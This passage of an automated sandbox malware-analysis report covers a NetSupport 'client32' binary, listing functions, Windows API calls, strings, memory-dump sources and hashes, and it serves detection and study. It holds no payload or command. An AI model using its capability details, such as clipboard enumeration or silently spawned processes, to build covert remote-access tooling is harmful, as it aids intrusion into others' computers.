                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Item$FolderMenuPath$BeepEnableFileLongMessageModuleNameObjectPropRectShowSystemTextwsprintf
                                                                                  • String ID: %sblockapp.jpg$BlockedAppFile$Client$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                  • API String ID: 1300213680-78349004
                                                                                  • Opcode ID: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                  • Instruction ID: 6f07d7162ed8c172429d77206b5c6f615c65d6256772802cbf9fe3e1e633a07a
                                                                                  • Opcode Fuzzy Hash: d5c730e152b545e79a5963070a614e137598c0869bf15a99c767d92fa3b08f3b
                                                                                  • Instruction Fuzzy Hash: 0641EE757403197FD720DBA4CC86FDAF3A4AB48B08F104568F3666B5C0DAB0B980CB55
                                                                                  Function 1105F200 Relevance: 19.9, APIs: 3, Strings: 10, Instructions: 368COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • wsprintfA.USER32 ref: 1105F251
                                                                                  • wsprintfA.USER32 ref: 1105F265
                                                                                    • Part of subcall function 110ED570: RegCreateKeyExA.ADVAPI32(00000000,0002001F,00000000,00000000,80000001,?,1105F29C,?,00000000,?,00000000,76938400,?,?,1105F29C,80000001), ref: 110ED59B
                                                                                    • Part of subcall function 110ED520: RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                  • wsprintfA.USER32 ref: 1105F5D6
                                                                                    • Part of subcall function 110ED180: RegEnumKeyExA.ADVAPI32(?,?,?,00000200,00000000,00000000,00000000,00000000,?,00000000), ref: 110ED1CB
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf$ExitProcess$CreateEnumErrorLastMessageOpen_strrchr
                                                                                  • String ID: %s\%s$ConfigList$General\ProductId$IsA()$NetSupport School$NetSupport School Pro$Software\Classes\VirtualStore\MACHINE\%s\%s\ConfigList$Software\NetSupport Ltd$Software\Productive Computer Insight$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                  • API String ID: 273891520-33395967
                                                                                  • Opcode ID: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                  • Instruction ID: 955d7069f5cd37ed2049fe2a08fe06563fb7c7f4ee9c814884e1c508eb43a074
                                                                                  • Opcode Fuzzy Hash: 144e512998ce06086377d7856f386d7a7ba87abc4e9c3983cefc13e406a89c1b
                                                                                  • Instruction Fuzzy Hash: D2E16079E0122DABDB56DB55CC94FEDB7B8AF58758F4040C8E50977280EA306B84CF61
                                                                                  Function 1100D330 Relevance: 19.6, APIs: 1, Strings: 12, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: wsprintf
                                                                                  • String ID: AlreadyStarted$AlreadyStopped$BadParam$CannotGetFunc$CannotLoadDll$DllInitFailed$Exception$NoCapClients$NotFound$RequiresVista$StillInstances$Unknown error %d
                                                                                  • API String ID: 2111968516-2092292787
                                                                                  • Opcode ID: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                  • Instruction ID: 0653d7d784af80274a32501aa5269da8b209429a0adf8b21c1593ff02ad98824
                                                                                  • Opcode Fuzzy Hash: 2a27fff999b9e6e65603effbbf8ecb71915a099c4e3576d618f0ecb40c1a2276
                                                                                  • Instruction Fuzzy Hash: 6FF0623268011C8BAE00C7ED74454BEF38D638056D7C8C892F4ADEAF15E91BDCA0E1A5
                                                                                  Function 11069590 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 96sleepCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 110695BD
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695D3
                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110695E9
                                                                                  • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 1106961D
                                                                                  • GetTickCount.KERNEL32 ref: 11069621
                                                                                  • wsprintfA.USER32 ref: 11069651
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A4
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000B,111829B3), ref: 110696A7
                                                                                  Strings
                                                                                  • ..\ctl32\Connect.cpp, xrefs: 11069661
                                                                                  • CloseTransports slept for %u ms, xrefs: 11069630
                                                                                  • idata->n_connections=%d, xrefs: 1106964B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$CountEnterLeaveTick$Sleepwsprintf
                                                                                  • String ID: ..\ctl32\Connect.cpp$CloseTransports slept for %u ms$idata->n_connections=%d
                                                                                  • API String ID: 2285713701-3017572385
                                                                                  • Opcode ID: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                  • Instruction ID: 9542bf7036752d1d59350afec772fc21505b61646605733d71942db81f3d6cc8
                                                                                  • Opcode Fuzzy Hash: 25aa856050ae0d0953e80f64c861d2d3aec5181f23948552882124df982d781f
                                                                                  • Instruction Fuzzy Hash: 64317A75E0065AAFD714DFB5C984BD9FBE8FB09708F10462AE529D3A44EB34A900CF94
                                                                                  Function 110654E0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 80COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • GetOEMCP.KERNEL32(View,Cachesize,00000400,00000000,7736C3F0,00000000), ref: 11065525
                                                                                    • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
                                                                                    • Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0
                                                                                  • GetDC.USER32(00000000), ref: 11065558
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 110655B9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CapsDevice_strtok$Release__wcstoi64
                                                                                  • String ID: Fs$932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
                                                                                  • API String ID: 3945178471-136916385
                                                                                  • Opcode ID: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                  • Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
                                                                                  • Opcode Fuzzy Hash: 058c2aae16d643b31adc47a1744bed462daca89727d2630be5973e582d58aa57
                                                                                  • Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0
                                                                                  Function 1100D690 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 80processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 110EE230: LocalAlloc.KERNEL32(00000040,00000014,?,1100D6AF,?), ref: 110EE240
                                                                                    • Part of subcall function 110EE230: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,1100D6AF,?), ref: 110EE252
                                                                                    • Part of subcall function 110EE230: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000,?,1100D6AF,?), ref: 110EE264
                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,00000000), ref: 1100D6C7
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1100D6E0
                                                                                  • _strrchr.LIBCMT ref: 1100D6EF
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 1100D6FF
                                                                                  • wsprintfA.USER32 ref: 1100D720
                                                                                  • _memset.LIBCMT ref: 1100D731
                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,04000000,00000000,00000000,?,?), ref: 1100D769
                                                                                  • CloseHandle.KERNEL32(?,00000000), ref: 1100D781
                                                                                  • CloseHandle.KERNEL32(?), ref: 1100D78A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseCreateDescriptorHandleProcessSecurity$AllocCurrentDaclEventFileInitializeLocalModuleName_memset_strrchrwsprintf
                                                                                  • String ID: %sNSSilence.exe %u %u$D
                                                                                  • API String ID: 1760462761-4146734959
                                                                                  • Opcode ID: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                  • Instruction ID: dcc8dc743a74700e759132c866a45fb8d4aebb64c19cbf1f793f2e736b28f377
                                                                                  • Opcode Fuzzy Hash: 5a07b90362417e06ee63b33ac0c07e57e7f23de675d2935ce727f3a21ceca9f2
                                                                                  • Instruction Fuzzy Hash: BB217675A812286FEB24DBE0CD49FDDB77C9B04704F104195F619A71C0DEB4AA44CF64
                                                                                  Function 11003010 Relevance: 18.1, APIs: 12, Instructions: 112COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateSolidBrush.GDI32(?), ref: 1100306D
                                                                                  • GetStockObject.GDI32(00000007), ref: 11003089
                                                                                  • SelectObject.GDI32(?,00000000), ref: 1100309A
                                                                                  • SelectObject.GDI32(?,?), ref: 110030A7
                                                                                  • InflateRect.USER32(?,000000FC,000000FF), ref: 110030D8
                                                                                  • GetSysColor.USER32(00000004), ref: 110030EB
                                                                                  • SetBkColor.GDI32(?,00000000), ref: 110030F6
                                                                                  • Rectangle.GDI32(?,?,?,?,?), ref: 11003110
                                                                                  • SelectObject.GDI32(?,?), ref: 1100311E
                                                                                  • SelectObject.GDI32(?,?), ref: 11003128
                                                                                  • DeleteObject.GDI32(?), ref: 1100312E
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Object$Select$Color$BrushCreateDeleteInflateRectRectangleSolidStock
                                                                                  • String ID:
                                                                                  • API String ID: 4121194973-0
                                                                                  • Opcode ID: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                  • Instruction ID: 33f6d49190b9b24a29b1cc3641f5325a4e922881409c492489886216f2d26618
                                                                                  • Opcode Fuzzy Hash: 07505c943f7c904391ce3d31e9dbb197024d6e0b57b5ab35bcc31df3057bc37b
                                                                                  • Instruction Fuzzy Hash: 98410AB5A00219AFDB18CFA9D8849AEF7F8FB8C314F104659E96593744DB34A941CBA0
                                                                                  Function 1113F710 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 252COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • std::exception::exception.LIBCMT ref: 1113F7AB
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1113F7C0
                                                                                  • SetPropA.USER32(?,?,00000000), ref: 1113F84E
                                                                                  • GetPropA.USER32(?), ref: 1113F85D
                                                                                  • wsprintfA.USER32 ref: 1113F88F
                                                                                  • RemovePropA.USER32(?), ref: 1113F8C1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Prop$wsprintf$Exception@8RemoveThrow_malloc_memsetstd::exception::exception
                                                                                  • String ID: NSMStatsWindow::m_aProp$UI.CPP$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                  • API String ID: 2013984029-1590351400
                                                                                  • Opcode ID: d1e565686244c353336eb47f8c903c4bdfa7357e5d2a0cf1c96f8e279f79a4e6
                                                                                  • Instruction ID: 9c375b31db466058645a4841bcb89a7be01c9296122d1f1adc6750c52d58ca69
                                                                                  • Opcode Fuzzy Hash: d1e565686244c353336eb47f8c903c4bdfa7357e5d2a0cf1c96f8e279f79a4e6
                                                                                  • Instruction Fuzzy Hash: 9071EC76B002299FD714CFA9DD80FAEF7B8FB88315F00416FE54697244DA71A944CBA1
                                                                                  Function 11033050 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 183clipboardCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CountClipboardFormats.USER32 ref: 11033091
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                    • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                    • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                  • EnumClipboardFormats.USER32(00000000), ref: 110330F6
                                                                                  • GetLastError.KERNEL32 ref: 110331BF
                                                                                  • GetLastError.KERNEL32(00000000), ref: 110331C2
                                                                                  • IsClipboardFormatAvailable.USER32(00000008), ref: 11033225
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ClipboardErrorLast$Formats$AvailableCountEnumExitFormatMessageProcess_malloc_memsetwsprintf
                                                                                  • String ID: ..\ctl32\clipbrd.cpp$Error enumclip, e=%d, x%x$ppFormats
                                                                                  • API String ID: 3210887762-597690070
                                                                                  • Opcode ID: 7e59b2d9765c5538991e48177014fa313e8989defddd3899bc08b96e04566e40
                                                                                  • Instruction ID: b804fa4b4600a3d7d633b164336aeb5b10f9113d5bb37ecf981567cf99ca6661
                                                                                  • Opcode Fuzzy Hash: 7e59b2d9765c5538991e48177014fa313e8989defddd3899bc08b96e04566e40
                                                                                  • Instruction Fuzzy Hash: 02518B75E1822A8FDB10CFA8C8C479DFBB4EB85319F1041AAD859AB341EB719944CF90
                                                                                  Function 11053590 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 162COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • EnterCriticalSection.KERNEL32(111EE294,50D94AA1,?,?,?,?,00000000,11181BDE), ref: 110535C4
